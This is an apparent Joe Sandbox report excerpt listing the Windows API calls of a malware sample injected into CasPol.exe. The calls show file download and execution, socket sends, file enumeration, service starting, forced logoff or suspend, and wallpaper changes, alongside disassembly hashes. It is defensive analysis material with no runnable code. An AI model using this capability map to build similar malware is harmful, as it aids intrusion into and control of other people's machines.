                                                                                                                        • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                        • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4043647387-0
                                                                                                                      • Opcode ID: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
                                                                                                                      • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                                                                                                                      • Opcode Fuzzy Hash: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
                                                                                                                      • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                                                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                                                                                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 276877138-0
                                                                                                                      • Opcode ID: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                                                                                                                      • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                                                                                                      • Opcode Fuzzy Hash: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                                                                                                                      • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                                                                                                        • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find$CreateFirstNext
                                                                                                                      • String ID: @CG$XCG$>G
                                                                                                                      • API String ID: 341183262-3030817687
                                                                                                                      • Opcode ID: 391819464a0a2cf1c4ff9909739b2089b0ccf6d7ba9323d43d3e7d0fb0295bd0
                                                                                                                      • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                                                                                                      • Opcode Fuzzy Hash: 391819464a0a2cf1c4ff9909739b2089b0ccf6d7ba9323d43d3e7d0fb0295bd0
                                                                                                                      • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                        • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                        • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                        • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                        • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                      • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                      • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                      • String ID: PowrProf.dll$SetSuspendState
                                                                                                                      • API String ID: 1589313981-1420736420
                                                                                                                      • Opcode ID: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
                                                                                                                      • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                                                                                                                      • Opcode Fuzzy Hash: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
                                                                                                                      • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                                                                                                                      APIs
                                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
                                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
                                                                                                                      • GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLocale
                                                                                                                      • String ID: ACP$OCP
                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                      • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                      • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                                                                                                                      • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                      • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                                                                                                                      • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                                                                                                                      • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                                                                                                                      • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                      • String ID: SETTINGS
                                                                                                                      • API String ID: 3473537107-594951305
                                                                                                                      • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                      • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                                                                                                                      • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                      • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                                        • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                        • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                                        • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                        • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                        • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 745075371-0
                                                                                                                      • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                      • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                                                                                                                      • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                      • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                                                                                                                      APIs
                                                                                                                      • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1157919129-0
                                                                                                                      • Opcode ID: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
                                                                                                                      • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                                                                                                                      • Opcode Fuzzy Hash: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
                                                                                                                      • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                                                                                                                      APIs
                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                                                                                      • _free.LIBCMT ref: 00448077
                                                                                                                        • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                        • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                      • _free.LIBCMT ref: 00448243
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1286116820-0
                                                                                                                      • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                      • Instruction ID: 9f73030e0ab81e705d7e97d576e5185c64763d3f00745452c155363557a16cba
                                                                                                                      • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                      • Instruction Fuzzy Hash: 97512A718002099BE714EF69CC829BF77BCEF44364F11026FE454A32A1EB389E46CB58
                                                                                                                      APIs
                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DownloadExecuteFileShell
                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                                      • API String ID: 2825088817-4197237851
                                                                                                                      • Opcode ID: 416f7853b316dbcf326f75883a86c549f58c6af075a40bd148702a8597430ad4
                                                                                                                      • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                                                                                                                      • Opcode Fuzzy Hash: 416f7853b316dbcf326f75883a86c549f58c6af075a40bd148702a8597430ad4
                                                                                                                      • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$FirstNextsend
                                                                                                                      • String ID: x@G$x@G
                                                                                                                      • API String ID: 4113138495-3390264752
                                                                                                                      • Opcode ID: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
                                                                                                                      • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                                                                                                                      • Opcode Fuzzy Hash: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
                                                                                                                      • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                        • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                        • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                        • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                      • API String ID: 4127273184-3576401099
                                                                                                                      • Opcode ID: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                                                                                                                      • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                                                                                                                      • Opcode Fuzzy Hash: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                                                                                                                      • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                                        • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                        • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                                        • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 00450C01
                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 00450C0F
                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4212172061-0
                                                                                                                      • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                      • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                                                                                                                      • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                      • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                                                                                                                      APIs
                                                                                                                      • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$FirstH_prologNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 301083792-0
                                                                                                                      • Opcode ID: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
                                                                                                                      • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                                                                                                                      • Opcode Fuzzy Hash: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
                                                                                                                      • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                                        • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                        • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                                        • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                        • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                        • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2829624132-0
                                                                                                                      • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                                      • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                                                                                                                      • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                                      • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                                                                                                                      APIs
                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434413), ref: 0043A765
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434413), ref: 0043A76F
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434413), ref: 0043A77C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3906539128-0
                                                                                                                      • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                      • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                                                                                                                      • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                      • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 00442585
                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 0044258C
                                                                                                                      • ExitProcess.KERNEL32 ref: 0044259E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1703294689-0
                                                                                                                      • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                      • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                                                                                                                      • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                      • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .
                                                                                                                      • API String ID: 0-248832578
                                                                                                                      • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                      • Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
                                                                                                                      • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                      • Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54
                                                                                                                      APIs
                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLocale
                                                                                                                      • String ID: GetLocaleInfoEx
                                                                                                                      • API String ID: 2299586839-2904428671
                                                                                                                      • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                      • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                                                                                                                      • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                      • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
